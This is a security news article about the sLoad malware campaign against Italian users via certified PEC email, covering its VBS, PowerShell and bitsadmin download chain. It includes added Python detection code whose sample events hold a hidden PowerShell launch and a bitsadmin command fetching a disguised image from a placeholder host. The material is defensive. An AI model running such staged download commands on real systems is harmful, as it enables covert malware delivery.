October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, the .ZIP archive, unlike those used in previous campaigns, didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The PDF served as a decoy meant to reassure the recipient that nothing was amiss so that they would run the script. If they did, the script launched a PowerShell script retrieved from the attackers’ infrastructure, which in turn downloaded a malicious .JPG using bitsadmin.exe. This technique helped the campaign evade detection by AV tools; the image file then loaded another PowerShell script that established persistence on the infected machine and issued a series of further commands to download the final payload.
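As an added detection example (not from the original article or from the Cybaze-Yoroi ZLAB report), the following Python walks constructed Sysmon-style process-creation events and flags the two observable stages of the chain described above: a Windows script host spawning PowerShell, and bitsadmin.exe fetching a URL that ends in an image extension, rated higher when both appear in one process ancestry. The event shape, field names, paths and URLs are assumptions.

```python
import re

# Constructed, Sysmon-style process-creation events (sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"pid": "1001", "ppid": "900", "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": "1100", "ppid": "1001", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\fattura.vbs"'},
    {"pid": "1200", "ppid": "1100", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -nop -c <stage-1 placeholder>"},
    {"pid": "1300", "ppid": "1200", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": "bitsadmin.exe /transfer job /download /priority high "
            "http://example.invalid/img.jpg C:\\Users\\u\\AppData\\Local\\Temp\\img.jpg"},
    # Benign-looking BITS job from explorer: same tool, no image extension, no script ancestry.
    {"pid": "2000", "ppid": "1001", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": "bitsadmin.exe /transfer update http://example.invalid/patch.msi C:\\Temp\\patch.msi"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A URL whose path ends in an image extension: the sLoad .JPG stage hides code behind one.
IMAGE_URL_RE = re.compile(r"https?://\S+\.(?:jpe?g|png|gif|bmp)\b", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestor_names(event, by_pid, limit=8):
    """Walk ppid links upward, returning the executable names of the ancestors (nearest first)."""
    names, cur = [], by_pid.get(event["ppid"])
    while cur and len(names) < limit:
        names.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return names

def detect_sload_chain(events):
    """Flag the two observable stages of the chain: script host -> PowerShell -> bitsadmin 'image'."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, chain = basename(e["image"]), ancestor_names(e, by_pid)
        # Stage 1: a Windows script host (the VBS) launching PowerShell.
        if name == "powershell.exe" and chain and chain[0] in SCRIPT_HOSTS:
            alerts.append(f"pid {e['pid']}: powershell.exe spawned by {chain[0]}")
        # Stage 2: bitsadmin /transfer fetching an "image"; severity rises when the
        # script-host -> PowerShell ancestry is present as well.
        if name == "bitsadmin.exe" and "/transfer" in e["cmd"].lower() and IMAGE_URL_RE.search(e["cmd"]):
            full_chain = "powershell.exe" in chain and any(h in chain for h in SCRIPT_HOSTS)
            sev = "high" if full_chain else "medium"
            alerts.append(f"pid {e['pid']}: bitsadmin image download [{sev}] ancestry={'>'.join(chain)}")
    return alerts
```

Run `detect_sload_chain(SAMPLE_EVENTS)` to see the two alerts; the benign `patch.msi` transfer produces none.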

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.
